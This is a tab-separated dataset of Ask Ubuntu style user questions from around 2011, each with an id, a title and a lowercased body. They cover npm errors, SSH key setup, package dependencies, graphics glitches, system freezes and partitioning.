54617	error while installing termkit	here is an error i 'm receiving while installing termkit : npm err ! error : not found : connect @ ' > =1.2.0- < 1.3.0-' npm err ! valid install targets : npm err ! [ `` latest '' , '' 0.0.1 '' , '' 0.0.2 '' , '' 0.0.3 '' , '' 0.0.4 '' , '' 0.0.5 '' , '' 0.0.6 '' , '' 0.1.0 '' , '' 0.2.0 '' , '' 0.2.1 '' , '' 0.2.2 '' , '' 0.2.3 '' , '' 0.2.4 '' , '' 0.2.5 '' , '' 0.2.6 '' , '' 0.2.7 '' , '' 0.3.0 '' , '' 0.4.0 '' , '' 0.5.0 '' , '' 0.5.1 '' , '' 0.5.2 '' , '' 0.5.3 '' , '' 0.5.4 '' , '' 0.5.5 '' , '' 0.5.6 '' , '' 0.5.7 '' , '' 0.5.8 '' , '' 0.5.9 '' , '' 0.5.10 '' , '' 1.0.0 '' , '' 1.0.1 '' ] npm err ! at installtargetserror ( /usr/local/lib/node_modules/npm/lib/cache.js:313:10 ) npm err ! at /usr/local/lib/node_modules/npm/lib/cache.js:306:17 npm err ! at saved ( /usr/local/lib/node_modules/npm/lib/utils/npm-registry-client/get.js:134:7 ) npm err ! at cb ( /usr/local/lib/node_modules/npm/node_modules/graceful-fs/graceful-fs.js:31:9 ) npm err ! report this *entire* log at : npm err ! < http : //github.com/isaacs/npm/issues > npm err ! or email it to : npm err ! < npm- @ googlegroups.com > npm err ! npm err ! system linux 2.6.39-02063901-generic npm err ! command `` node '' `` /usr/local/bin/npm '' `` install '' npm err ! node -v v0.5.3-pre npm err ! npm -v 1.0.22 npm err ! n pm err ! additional logging details can be found in : npm not ok any ideas ?
54621	duplicated , interlaced and distorted graphics on my hp dv6000	issue when i boot from the live usb , after selecting `` try ubuntu ... '' all graphics are interlaced , shifted to the right , duplicated and distorted -- even the terminal when i access it by pressing ctrlaltf5 . unity is also disabled . why would you call that a problem , some might say information ubuntu version 11.04 boot media usb graphics card lspci | grep -i vga states 00:12.0 vga compatible controller : nvidia corporation c67 \ [ geforce 7150m /nforce 630m ] ( rev a2 ) 2 )
54626	will i be able to run gnome 2 in 11.10 ?	will there be a way to eliminate gnome 3 in 11.10 and install gnome 2 on that sytem ?
54636	how to increase text size ?	the option at the login screen indeed makes the text bigger and easier to read but it only seem to be in effect for the login screen . when i login to the desktop , everything is back to normal size . is this supposed to behave this way ? your answer will be appreciated . thanks .
54638	ubuntu & ipod touch 1st gen , nano 5th gen syncing	okay , so here 's the deal . i have ubuntu 11.04 a green ipod nano 5th gen with video 8gb . i 'm fairly new to ubuntu but trying to embrace it . my major issue is , my ipod used to work but i filled it and tried to wipe it and start again . when i wiped it , it left 3 songs ? and still had over 1gb used of 'other ' . whenever i tried to upload songs on to it it did n't work anymore . it even went into disk mode and when i googled how to get it out of it , and did it , it told me to connect to itunes to restore it . so , i took it to my friends show has itunes on mac , restored it , took it home , connected it , did n't recognize it . i put it down to being formatted for a mac . found a friend with itunes/windows ( there are n't many out there ! ) restored it but he put his flat mates music on it too to annoy me . i now had mariyah carey on there . what if i died . i 'd be found with an ipod and mariyah carey christmas album 2 . { : ( so excited to get home and change it , wiped all the crap off it , left the few albums that were good , disconnected it . everything is still on it , still says 1000+ songs , shows artists , albums , songs , but the music is n't on it apart from the few albums i left and neither is the artwork . i 'm usually ocd about my ipod , this upsets me greatly . luckily it has radio for the time being . but i 've tried gtkpod which used to work , rhythmbox , hipo , floola and i 'm about to try banshee . i keep getting library errors . i tried my friends ipod touch 1st gen to see if it was my ipod that was the problem . but that comes up with errors too . any help to a noob will be greatly appreciated . i probably have n't supplied you with half the info you need so please write back and ask if you think you may be able to help . thanks .
54640	system center icon does n't show when pinned to launcher	on natty narwhal , i dragged system center to the launcher . instead of an icon , i get a blank square on the launcher . clicking on it does launch the system center , though . this issue does not happen with other apps i pinned to the launcher .
54644	how can i set up hourly deja-dup backups ?	is there a way i get the amazing deja-dup to make me hourly backups in addition to daily , weekly , biweekly etc ? if not , is there something else that i could use instead ?
54648	install nagios3 package on 11.04	i recently installed nagios3 using synaptic on 11.04 and am having a hard time locating updated docs . last time i installed nagios i did it manually , but the updated quickstart doc does n't account for the path changes with the package install . i 've read the what 's new doc , but am still unclear on which parts of quickstart are still valid given the path changes . i 'd also like to put a custom theme back in place and thats changed also . if anyone would please point a novice in the right direction i would appreciate it .
54654	compress and split files in nautilus	if you right click a file in nautilus and select compress , then you get a dialog where you can choose a compression format and a filename . if you click on advanced , then there are settings to split and compress the file , but it 's deactivated/insensitive . how come and how do i activate those features ? edit : in an answer below , it has been suggested that it has something to do with rar . but i have that installed , and i do n't get the options to split .
54658	top bar is grey for desktop user but not for initial user	on 11.04 , i get nice black top bar and launcher for the first user i create . when i add another user as a desktop user and log in as that new user , i do n't get the black top bar , even after setting the theme to ambiance ( which is the theme for the first user ) . how can i enable the same look and feel for the new user ? thanks , anand
54659	how to change the login screen background from terminal ?	i am in the process of customizing a live cd . i have changed the default ubuntu wallpaper in live cd , however the same got reflected in login screen . i just want to change the wallpaper alone and not the login screen background . any other way ?
54660	how to change the user password	alright i go into the terminal and type in sudo passwd random-pass -enter- [ sudo ] password for user : [ ] i type whatever password i want in and the insertion point/caret just stays in the same spot . i type and it gets all dodgey so it shows nothing when i type my password -enter again- ( thinking it is fine when the insertion point isnt moving ) sorry ; try again [ sudo ] password for user : it does nothing and i cant process nay commands , well not many throughout the terminal . it is very agitating .
54661	wine 1.3.25 update broke sound , how do i go back ?	last friday 's wine update to 1.3.25 broke sound , how do i go back to the previous version of wine ?
54664	preview video in elementary nautilus ?	im using ubuntu 11.04 . in elementary nautilus , i can preview a music thumbnail by hover the mouse cursor on it . but i cant do it with the video files . i 've set `` only for the files smaller than : 100mb '' in preferences/preview but nothing changed . please help !
54670	passwordless ssh not working	i 've tried to setup a password-less ssh b/w a to b and b to a as well . generated the public and private key using ssh-keygen -trsa on both the machines . used the ssh-copy-id utility to copy the public-keys from a to b as well as b to a . the passwordless ssh works from a to b but not from b to a. i 've checked the permissions of the ~/ssh/ folder and seems to be normal . a 's .ssh folder permissions : -rw -- -- -- - 1 root root 13530 2011-07-26 23:00 known_hosts -rw -- -- -- - 1 root root 403 2011-07-27 00:35 id_rsa.pub -rw -- -- -- - 1 root root 1675 2011-07-27 00:35 id_rsa -rw -- -- -- - 1 root root 799 2011-07-27 00:37 authorized_keys drwxrwx -- - 70 root root 4096 2011-07-27 00:37 .. drwx -- -- -- 2 root root 4096 2011-07-27 00:38 . b 's .ssh folder permissions : -rw -- -- -- - 1 root root 884 2011-07-07 13:15 known_hosts -rw-r -- r -- 1 root root 396 2011-07-27 00:15 id_rsa.pub -rw -- -- -- - 1 root root 1675 2011-07-27 00:15 id_rsa -rw -- -- -- - 1 root root 2545 2011-07-27 00:36 authorized_keys drwxr-xr-x 8 root root 4096 2011-07-06 19:44 .. drwx -- -- -- 2 root root 4096 2011-07-27 00:15 . a is an ubuntu 10.04 ( openssh_5.3p1 debian-3ubuntu4 , openssl 0.9.8k 25 mar 2009 ) b is a debian machine ( openssh_5.1p1 debian-5 , openssl 0.9.8g 19 oct 2007 ) from a : # ssh b works fine . from b : # ssh -vvv a ... ... debug1 : ssh2_msg_service_accept received debug2 : key : /root/.ssh/identity ( ( nil ) ) debug2 : key : /root/.ssh/id_rsa ( 0x7f1581f23a50 ) debug2 : key : /root/.ssh/id_dsa ( ( nil ) ) debug3 : wrote 64 bytes for a total of 1127 debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , gssapi , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : trying private key : /root/.ssh/identity debug3 : no such identity : /root/.ssh/identity debug1 : offering public key : /root/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug3 : wrote 368 bytes for a total of 1495 debug1 : authentications that can continue : publickey , password debug1 : trying private key : /root/.ssh/id_dsa debug3 : no such identity : /root/.ssh/id_dsa debug2 : we did not send a packet , disable method debug3 : authmethod_lookup password debug3 : remaining preferred : , password debug3 : authmethod_is_enabled password debug1 : next authentication method : password root @ 192.168.122.1 's password : which essentially means it 's not authenticating using the file /root/id_rsa . i ran the ssh-add command in both the machines as well . the authentication part of /etc/ssh/sshd_config file is # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files i 'm running out of ideas . any help would be appreciated .
54672	determine if monitor is off	how do i determine the state of my monitor in ubuntu 11.04 . i 've seen a lot of stuff regarding dpms , but for what ever reason , i do n't have the dpms module running on my ubuntu install and i 'd really rather not go messing with my xorg.conf file if i can help it .
54673	ipv4 address to netmask mapping and multiple default routes feasibility ?	we have , class range netmask bits bits hosts # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- a 0-127 255.0.0.0 8 24 16777216 ( i.e . 114.0.0.0 ) b 128-191 255.255.0.0 16 16 65536 ( i.e . 150.0.0.0 ) c 192-254 255.255.255.0 24 8 256 ( i.e . 199.0.0.0 ) also , $ cat /proc/version linux version 2.6.32-amd64 ( gcc version 4.3.2 ( debian 4.3.2-1.1 ) ) # 1 smp tue jul 1 18:36:07 utc 2011 $ ip route show 114.0.0.0/24 dev eth1 scope link 114.0.0.0/16 dev eth1 scope link 114.0.0.0/8 dev eth1 scope link 199.0.0.0/8 dev eth1 scope link 122.0.0.0/8 dev eth1 scope link default via 16.107.200.1 dev eth0 default via 16.107.200.1 dev eth1 default via 16.107.200.20 dev eth1 default via 16.107.200.21 dev eth1 default via 16.107.200.22 dev eth1 default via 16.107.200.23 dev eth1 question1 . as per the above display , using iproute 2009 version i am getting ipv4 class a address holding class c or b netamsk and vice-versa . is it a valid configuration ? question2 . as per the above display , if iproute allow to add multiple default routes , then what would be the behavior of packet flow when packet need to be routed using only one default route ( where many default routes exist ) ? also how the iproute filter multiple default routes ? also , is it a valid feature that iproute should allow multiple default routes in a server setup ?
54679	`` cogs '' startup problem	when i try to run the game cogs from the command line , the game spits out the following error and dies immediately : could n't set 800x600 opengl video mode : could n't find matching glx visual what does this mean , and how can i fix this ? edit : i have an intel graphics card .
54680	is it normal for alpha versions to randomly uninstall packages ?	i 've been running oneiric alpha on a laptop , since the ati drivers in natty are n't new enough for the hardware . in general it 's worked well ; naturally there are the occasional crashes and bug reports . the strange thing is that -- on occation -- packages will uninstall themselves when i do an update . t he first major one was unity . lightdm did n't have anything in the sessions menu , so i could n't log in . i looked at .xinit files , searched all over , and finally figured out that unity had completely removed itself , even though it was the primary session type . on another occasion , lightdm-greeter-gtk removed itself . again , i had to hunt around in the logs to find that there was suddenly no greeter , although it had been working flawlessly for weeks before the update . i 'm not asking for stability -- i know it 's an alpha . i 'm just curious as to why packages decide to leave .
54681	can i make do-release-upgrade only download packages for a later upgrade ?	i 'm running lubuntu 10.10 , and would like to upgrade to 11.04 . i have a very temperamental internet connection , so would like to download all the packages before running the install . according to this , there is no easy way to do this . the bug report mentioned in that thread is still open . my question : is there a way to hack do-release-upgrade to only download the packages , kind of like adding a `` -d '' to apt-get dist-upgrade ? or is doing it manually the only way to get the results i desire ? if i have to do it manually , are these the steps needed to do it , or am i missing something ? : disable 3rd party repositories in /etc/apt/sources.list and /etc/apt/sources.list change repositories in /etc/apt/sources.list from maverick to natty run sudo apt-get update run sudo apt-get -d dist-upgrade to only download the packages . do this as many times as necessary until all the packages are downloaded . run sudo apt-get dist-upgrade to complete the upgrade process
54686	stuck in the busy box	i have been using windows xp and ubuntu natty using dual boot . it has run perfectly until one day when i tried to boot ubuntu i am getting the busy box shell . i dont know what that is : ( when i try to restart , the following options come up . ubuntu 11.04 ubuntu recovery mem test another mem test win xp pro when i try to open win xp it opens perfectly..
54692	how to recover a file which was removed in nautilus when running as root ?	i 'm new with ubuntu and used the command sudo -s to become root and executed nautilus to open my nautilus elementary as root . while managing my files , i wrongly pressed the `` delete '' button on my important folder . i thought that folder will going to trash folder , but if i click on trash ( in nautilus running as root ) my nautilus was immediately closed , with the below error in a terminal : ** ( nautilus:30221 ) : critical ** : nautilus_file_get_location : assertion `nautilus_is_file ( file ) ' failed ( nautilus:30221 ) : glib-gio-critical ** : g_file_get_uri : assertion `g_is_file ( file ) ' failed ** error : nautilus-window-manage-views.c:819 : begin_location_change : assertion failed : ( location ! = null ) on other user accounts , the trash folder seems to be in .trash , but but in /root , there is no such directory . where is my folder that i deleted ?
54695	how to automatically connect to a windows network folder ?	through the normal processes i enter my shared music folder on my windows computer , i.e . : places > network > windows pc > music . after rebooting my ubuntu laptop , however , this connection is n't automatically set again . my question : how do i get ubuntu to automatically connect to that shared folder after login ( while first checking whether the windows computer is 'online ' ) ? this because i added the folder to the banshee library , and i currently first have to go to the shared folder manually before banshee can play the files .
54697	how to play two sounds	the idea : the internet radio plays constantly . in some conditions i want to play from console : mpg123 -- gain 5 file.mpg when nothing is using the audio device mpg123 works . however , when firefox is playing internet radio it does't . is it possible to play from two different sources ?
54698	ubuntu keeps randomly freezing	my ubuntu 11.04 installation keeps randomly freezing . i ca n't really find a pattern in when it happens . first the cursor starts lagging behind for about 5 seconds , and then suddenly the whole screen freezes . things like ctrl+alt+f1 also do not work at those times . this is getting really annoying , and on the ubuntu irc no'one seems to be getting any further than i do . this is my dmesg : http : //paste.ubuntu.com/653077/ it froze again about 5 or 10 minutes ago . i am using the nvidia-173 drivers because unity wo n't work using the nvidia-current ones . edit i seem to have solved most of these freezes myself by enlargin my swap partition . i thought i had a 1gib one ... turned out i made a mistake and had actually made it 1mib xd i now resized it to 4*gib* . but my computer still freezes regularly , and this is really pissing me off now ... this is a more recent dmesg : http : //paste.ubuntu.com/664464/ . it froze again a few minutes ago .
54699	getting error while trying to install liferea rss reader	once i press install i get : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details the following packages have unmet dependencies : liferea : depends : libatk1.0-0 ( > = 1.12.4 ) but 2.0.0-0ubuntu1 is to be installed depends : libc6 ( > = 2.7 ) but 2.13-0ubuntu13 is to be installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.8.0-2.1ubuntu3 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.4-1ubuntu2.1 is to be installed depends : libgconf2-4 ( > = 2.31.1 ) but 2.32.2-0ubuntu2 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.23.3-0ubuntu1 is to be installed depends : libglade2-0 ( > = 1:2.6.1 ) but 1:2.6.4-1build1 is to be installed depends : libglib2.0-0 ( > = 2.24.0 ) but 2.28.6-0ubuntu1 is to be installed depends : libgtk2.0-0 ( > = 2.18.0 ) but 2.24.4-0ubuntu2 is to be installed depends : libice6 ( > = 1:1.0.0 ) but 2:1.0.7-1ubuntu1 is to be installed depends : libnotify1-gtk2.10 but it is a virtual package depends : libpango1.0-0 ( > = 1.14.0 ) but 1.28.4-0ubuntu1 is to be installed depends : libsoup2.4-1 ( > = 2.26.1 ) but 2.34.0-0ubuntu1 is to be installed depends : libsqlite3-0 ( > = 3.7.3 ) but 3.7.4-2ubuntu5 is to be installed depends : libunity4 ( > = 3.4.6 ) but 3.8.4-0ubuntu1 is to be installed depends : libxml2 ( > = 2.7.4 ) but 2.7.8.dfsg-2ubuntu0.1 is to be installed depends : gconf2 ( > = 2.28.1-2 ) but 2.32.2-0ubuntu2 is to be installed depends : liferea-data ( = 1.6.4-1ubuntu7 ) but 1.6.5-1~mmwkt1 is to be installed
54700	how to make menubar appear in k3b ( unhide it ) ?	when i open k3b , there is no menubar ( that appears directly under the titlebar ) , only a toolbar . how do i make the menubar appear ? i 've tried tapping f10 , alt , alt + f. how do i unhide the menubar ?
54701	why are ( uninstalled ) packages listed in the `` local '' repository ( in synaptic ) after an upgrade ?	i just upgraded a computer from 10.10 to 11.04 using the do-release-upgrade command . ( this was the first time i 've actually done an upgrade . ) i had a few ppa 's in my setup , which got removed from my configuration during the upgrade . i 've gone back and re-added those ppa 's ( like thunderbird stable and flash 11 ) , and updated and upgraded . now when i look in synaptic , i see a lot of `` orphaned '' ( ? ) packages in the `` local '' origin . i can `` mark for complete removal '' on those packages , but then i ca n't `` apply '' those changes . what 's going on here ? is it possible to clean these out to make the system `` clean ? ''
54703	desktop disappears ubuntu 10 after sitting idle	i recently built 2 identical intel i7 ubuntu 10.04 32 machines and have a problem with my desktop or gnome session disappearing . for example , if i leave the machine sitting at the desktop ( actually i am pretty sure even if i leave it at the login screen the same issue happens ) , at some point ( 1-3 days maybe ) when i come back to it , it will have only the color pattern of the desktop . no icons , no menu bars , nothing else . clicking , moving the mouse , pressing keys on the keyboard all do nothing . accessing the machine through vnc or team viewer i see the same thing ! a couple times now i have also experienced the machine seems very slow or mostly unresponsive . a couple times i was still able to ssh in to the machine and reboot it . once i could not even ssh in and i had to power cycle it . beyond the base os install which was a fresh install , i have backuppc , crashplan , teamviewer , tightvncserver , open ssh server and i set up a mdadm software raid 5 with 3 drives . i did also enable the pae ( ? ) so ubuntu 32 would see the full 4 gigs of ram . note that i have a basically identical 3rd older machine with no problems . the only real difference i believe is the hardware - it 's an intel i5 machine . any thoughts on what i should try or look at the next time it freezes up ? i looked through my dmesg log and nothing in there i could see . update : i updated all the machines to ubuntu 11 last week to see if that helps . unfortunately this morning i turned on the monitor and i have an almost blank desktop . no menu bars or clock - only thing i have are the two icons that are normally on my desktop . alt-f2 does not seem to do anything . the machine is responsive in other ways though - i can access the samba server and ssh , but the gnome desktop is no good . this time i do see lots of strage info when i type 'dmesg ' - it 's just a small sample - how do i look at all of it ? : [ 425794.900377 ] cpu 7 : hi : 186 , btch : 31 usd : 0 [ 425794.900382 ] active_anon:747275 inactive_anon:207413 isolated_anon:0 [ 425794.900383 ] active_file:349 inactive_file:618 isolated_file:0 [ 425794.900384 ] unevictable:0 dirty:0 writeback:1 unstable:0 [ 425794.900385 ] free:28156 slab_reclaimable:4790 slab_unreclaimable:15168 [ 425794.900387 ] mapped:194 shmem:311 pagetables:2724 bounce:0 [ 425794.900393 ] dma free:7292kb min:64kb low:80kb high:96kb active_anon:0kb inactive_anon:0kb active_file:0kb inactive_file:0kb unevictable:0kb isolated ( anon ) :0kb isolated ( file ) :0kb present:15800kb mlocked:0kb dirty:0kb writeback:0kb mapped:0kb shmem:0kb slab_reclaimable:28kb slab_unreclaimable:44kb kernel_stack:0kb pagetables:0kb unstable:0kb bounce:0kb writeback_tmp:0kb pages_scanned:0 all_unreclaimable ? yes [ 425794.900399 ] lowmem_reserve [ ] : 0 869 4031 4031 [ 425794.900407 ] normal free:104852kb min:3736kb low:4668kb high:5604kb active_anon:289524kb inactive_anon:289684kb active_file:1316kb inactive_file:1780kb unevictable:0kb isolated ( anon ) :0kb isolated ( file ) :0kb present:890008kb mlocked:0kb dirty:0kb writeback:4kb mapped:468kb shmem:400kb slab_reclaimable:19132kb slab_unreclaimable:60628kb kernel_stack:3848kb pagetables:1472kb unstable:0kb bounce:0kb writeback_tmp:0kb pages_scanned:4964 all_unreclaimable ? yes [ 425794.900413 ] lowmem_reserve [ ] : 0 0 25299 25299 [ 425794.900422 ] highmem free:480kb min:512kb low:3908kb high:7308kb active_anon:2699576kb inactive_anon:539968kb active_file:80kb inactive_file:692kb unevictable:0kb isolated ( anon ) :0kb isolated ( file ) :0kb present:3238372kb mlocked:0kb dirty:0kb writeback:0kb mapped:308kb shmem:844kb slab_reclaimable:0kb slab_unreclaimable:0kb kernel_stack:0kb pagetables:9424kb unstable:0kb bounce:0kb writeback_tmp:0kb pages_scanned:1216 all_unreclaimable ? yes [ 425794.900427 ] lowmem_reserve [ ] : 0 0 0 0 [ 425794.900431 ] dma : 13*4kb 13*8kb 14*16kb 14*32kb 11*64kb 11*128kb 9*256kb 4*512kb 0*1024kb 0*2048kb 0*4096kb = 7292kb [ 425794.900441 ] normal : 545*4kb 3738*8kb 1954*16kb 421*32kb 130*64kb 42*128kb 34*256kb 7*512kb 2*1024kb 0*2048kb 0*4096kb = 104852kb [ 425794.900451 ] highmem : 146*4kb 2*8kb 0*16kb 0*32kb 0*64kb 0*128kb 0*256kb 0*512kb 0*1024kb 0*2048kb 0*4096kb = 600kb [ 425794.900461 ] 7359 total pagecache pages [ 425794.900463 ] 6028 pages in swap cache [ 425794.900465 ] swap cache stats : add 76118 , delete 70090 , find 8162246/8166421 [ 425794.900467 ] free swap = 0kb [ 425794.900469 ] total swap = 93180kb [ 425794.910862 ] 1310704 pages ram [ 425794.910865 ] 1082370 pages highmem [ 425794.910866 ] 283533 pages reserved [ 425794.910868 ] 1832 pages shared [ 425794.910869 ] 996924 pages non-shared [ 425794.910873 ] out of memory : kill process 13783 ( lshw ) score 31039 or a child [ 425794.910877 ] killed process 13783 ( lshw ) vsz:124156kb , anon-rss:105456kb , file-rss:0kb [ 433508.955028 ] ce : hpet increased min_delta_ns to 56952 nsec update : i have discovered there may be several issues going on . so far i have solved : when the machine reboots , it was getting stuck during the shutdown process at/around a line saying automatic updates . i had that turned on , so i turned it off and i think that 's better - no longer getting stuck . on two of the machines i was not using the proprietary nvidia driver . installing that seems to have made a difference in terms of video looking better , but also i am not getting errors with widgets like i was when it booted up . hopefully it will also contribute to stability . i am running crashplan for backup . i had the openjdk version of java installed . i noticed yesterday the machine was very slow and i killed crashplan . it got much faster . so it 's either crashplan or java at fault . based on past bad experiences i have uninstalled openjdk and installed the sun ( oracle ? ) java and will see what happens with that . one of the machines i had run the ubuntu 11 update . however i guess it never completed , because i checked for updates and noticed it said i could update to ubuntu 11 ! in trying to update software i was getting all kinds of errors . i have a feeling the system may have been in some strange in-between state of software versions . i am finishing up updates and upgrade to unbntu 11 to see if that cleans up a lot . this is the machine that threw all those strange errors above .
54709	can compiz ring-switcher show high resolution icons for minimized windows ?	compiz ring-switcher shows minimized windows ' icons of very low quality ( other than the current icon theme btw ) . can i make it pick svg icons from the current icon theme instead ? ps : this is also true for shift-switcher .
54710	how do i reset the network adapter using a terminal command ?	well , when i turn the router off and then i turn it on again while running ubuntu , it does n't obtain an ip address automatically : i click on disconnect , but it remains like above . it works only if i log out and switch to another session and then back the default one . so how do i reset the network adapter using a terminal command , or any another suggestions ? edit : i 've tried using sudo dhclient , but it did n't work .
54711	`` unrecoverable error '' during installation	i have an old dell computer and i want to switch from windows xp and install the new ubuntu . i have tried multiple times to download it via cd-r but keep getting the same error message : unrecoverable error . the error happens after the menu which lists try ubuntu , install ubuntu , etc.it only gets as far as the screen with a toolbar on the top that includes power , sound , and two arrows . that is when the message displays . switching to desktop version to find what the problem is ( or something like that . ) what is going wrong ?
54712	how do i install missing dependencies on my system ?	i was fooling around trying to fix this problem , and i removed some important packages . when i realized that it was cleaning out more things that i had intended , i just rebooted , rather than try to find the forked process and stop it . now i can see in aptitude that i have several broken packages , which do not show up in synaptic . rather than try to install the missing packages ( e.g. , python , yikes ! ) , the `` resolution '' is to remove 354 packages that are still installed which depend on what 's missing . is there a command to go through all the installed packages , and make sure that all of their dependencies are also installed ? if i could just get a list , that would be useful , but , clearly , a command to just `` do it '' and install them would be better .
54717	how do you write a script that alerts you in the terminal like mail 's `` you have mail ''	i guess i 'm looking for how to make a script to run whenever you press enter in bash , so that it can alert you by echoing a line about some event if an event has occurred .
54719	can i split /boot to a different partition on a single partition system ?	the title says it all . i have set up my system , configured it and everything , using only one partition for / ( ext4 ) . so no separate home , boot , swap etc . so the question is : is there a way to go from this configuration to a 'separate ' partition thing ? can i make room for a separate boot partition and maybe copy my /boot there ?
54722	how do i determine the power state of my monitor ?	how do i determine the state of my monitor in ubuntu 11.04 . i 've seen a lot of stuff regarding dpms , but for what ever reason , i do n't have the dpms module running on my ubuntu install and i 'd really rather not go messing with my xorg.conf file if i can help it .
54724	increase the windows partition	first i had only windows 7 installed then i installed ubuntu 11.04 and gave it alot of space now i want to take free 140gb which on the ubuntu partition and give it to the windows partition how can i do that ?
54727	installing natty on portable hard drive	i am planning to install ubuntu 11.04 on a portable hard drive ( no external power supply , typically 5400 rpm , usb 2.0 , 250 gb ) . this way i wont have to install apps on every machine i work on . i will just boot off this hdd whenever i am working . i have seen lot of similar questions and have gained some idea of how to do it . what i need to know is - what will be the os boot speed , and response time of general applications like firefox , eclipse/netbeans , gimp , inkscape etc ? will there be noticeable difference than internal hard drives ? at least it should not drag as it does with live-usb using a regular usb stick . given that i will be using it heavily , are portable hdd more prone to wear and tear ? i will make atleast 3 partitions , one for os ( ubuntu ) , one for home , and one for other data that i want to be visible from windows ( like media , photos etc ) . if i format the external hard drive 's 1st two partitions in ext4 and 3rd in ntfs , will that be fine with windows and linux ? should i create swap space ? is there any particular ubuntu distro , thats optimized for such ( by storing all caches on ram and mimimizing hdd writes ) references : installing ubuntu on external hard disk modification on usb bootable drive external usb hard drives - what speeds should be expected ?
54730	what do i need to know if i compile something in order to make it run on other people 's machines ?	if i compile something and want to send the binary to a friend or post it on the internet , do i need to use some special gcc arguments ? does gcc optimize the binary for my specific cpu and will it run on cpus that are a bit different or on an other linux distribution ? what else do i need to know ?
54737	i just moved my hd from a lenovo x201 to a lenovo w520 , and everything seems to work . is this ok ?	i had ubuntu natty full configured and working on the ssd drive in my lenovo x201 thinkpad . then i got a lenovo w520 thinkpad , which i 'm sure has different wireless card and graphics card and other things . i popped out the ssd drive from the x201 and put it into the w520 . this ssd is the master/boot drive and also holds all my data . i turned on the w520 , and to my surprise , everything just works . is this to be expected ? i do n't need to do a clean installation ? in other words , is ubuntu generally installed on a hard drive in a way that make it portable across different thinkpad models and configurations ?
54739	internal dvd player is not recognised	having trouble with my dvd player , sometimes it plays and sometimes the system does n't even recognize that it 's there . it ran fine under windows . i 'm running 11.04 64bit ( it is a 64bit system ) this is the info that came up when i ran `` sudo lshw '' for the player . *-cdrom description : dvd-ram writer product : dvd a dh16absh vendor : atapi physical id : 1 bus info : scsi @ 5:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 version : ya12 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc
54741	only root can play sounds	i did a minimal installation of ubuntu server on my computer cause i wanted to have a clean environment to run a very lightweight window manager ( xmonad ) . i do n't know much about the sound system in ubuntu so i blindly installed alsa and pulseaudio and thought it would work out-of-the-box . it turns out my user ca n't play sounds , though i can play any sound if i 'm logged as root ( via sudo su ) . how do i add sound playing priviledges to my user ?
54742	how to cancel software upgrade	when i turned my computer on today , i opened a terminal and ran sudo apt-get update followed by sudo apt-get upgrade . but i read on omg ! ubuntu that the latest version of wine , 1.3.25 , `` breaks audio playback for windows apps '' . i obviously did n't want to break sound in my games , so i decided i had to keep the old 1.3.24 version until the problem was fixed . i did n't know how to stop the software upgrade , so i just pressed ctrl+z while it was downloading the new version . what should i do now ?
54747	automatically kill a process if it exceeds a given amount of ram	i work on large-scale datasets . when testing new software , a script will sometimes sneak up on me , quickly grab all available ram , and render my desktop unusable . i 'd like a way to set a ram limit for a process so that if it exceeds that amount , it will be killed automatically . a language-specific solution probably wo n't work , as i use all sorts of different tools ( r , perl , python , bash , etc ) . so is there some sort of process-monitor that will let me set a threshold amount of ram and automatically kill a process if it uses more ?
54749	dovecot install : `` /usr/lib/dovecot/imap : no such file or directory ''	i have set up postfix and am now attempting to set up dovecot . i did apt-get install dovecot-common i have changed dovcot.conf to include the following protocols = imap imaps and i now get this error when restarting dovcot error : mail_executable : ca n't use /usr/lib/dovecot/imap : no such file or directory fatal : invalid configuration in /etc/dovecot/dovecot.conf did i install the wrong package , is there another package i need , or am i missing something else ? thanks .
54758	why does ubuntu freeze frequently since i upgraded my ram ?	i upgraded the ram of my laptop to 4 gb by using two ram chips with the following specification : storage capacity : 2 gb memory type : dram technology : ddr2 sdram form factor : so dimm 200-pin memory speed : 800 mhz ( pc2-6400 ) data integrity check : non-ecc ram features : unbuffered supply voltage : 1.8 v compatible slots : 1 x memory - so dimm 200-pin since i upgraded my ram , ubuntu freezes every once in a while . when ubuntu freezes , i shutdown down my laptop and reboot using the ubuntu live cd to check for file sytem errors . then , i run the fsck program , and it discovers and fixes some file systems errors . then , i run the badblock program . but , badblocks does not find any problems . i believe the fact that badblocks does not report any problems shows that my hard disk is healthy . and , the filesystem errors seem to be due to the forced shutdowns . i 'm using 64 bits ubuntu 10.04 lucid with kernel 2.6.32-33-generic . how can i troubleshoot this problem ? how can i find out why my ubuntu freezes ? what log files should i consult ? what should i look for in the log files to find the cause of freezes ?
54760	issues with /home partition and a fresh install	i had my /home one partition and /root on another , swap also had its own partition at the end of the drive as well . i of course kept all my important documents and family photo 's on /home for reasons to long for an explanation i decided too re-install ubuntu 10.04 . during the installation i assigned ubuntu to be installed on its previous partition / and assigned the previous home to be used as /home , i did not mark /home to be formatted only used . upon booting into my new fresh ubuntu installation i find that all my old documents , photo 's and other important things to be missing . the partition is mounted and being used it 's just showing the data that was previously in the directory.. so i guess my question would be how can i get ubuntu to understand that data was there i wanted to show in my new installation.. i can do basic things with ubuntu but a step-by-step would be best if such solution existed to solve this . thank you
54761	install office 2007 using playonlinux ( wine ) will not allow to enter cdkey	i just installed microsoft office 2007 using playonlinux ( a wine 's front end ) , and it installed successfully , the only problem is that i ca n't enter the serial number , becouse the text box will not get focus . any one had experienced this ? any idea how to solve ?
